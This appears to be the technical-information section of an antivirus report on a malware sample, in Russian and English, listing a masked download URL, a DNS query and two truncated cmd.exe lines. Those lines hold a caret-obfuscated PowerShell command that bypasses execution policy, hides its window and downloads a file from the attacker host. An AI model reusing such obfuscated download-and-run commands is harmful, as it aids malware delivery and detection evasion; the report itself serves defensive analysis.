Техническая информация
- http://to###ores.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^O^WErshE^ll^.^e^X^E -exE^C^UTi^o^Npol^Ic^Y^ B^Y^p^A^SS -^nOpR^OFIlE -W^INd^owSt^YL^E HIDdEn^ ^(N^ew^-^o^BJect sYs^TeM.n^et.w^e^b^ClIENt^)^.D^o^wN^l^oADFIlE^('http://to###o...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "P^O^WErshE^ll^.^e^X^E -exE^C^UTi^o^Npol^Ic^Y^ B^Y^p^A^SS -^nOpR^OFIlE -W^INd^owSt^YL^E HIDdEn^ ^(N^ew^-^o^BJect sYs^TeM.n^et.w^e^b^ClIENt^)^.D^o^wN^l^oADFIlE^('http://to###o...' (со скрытым окном)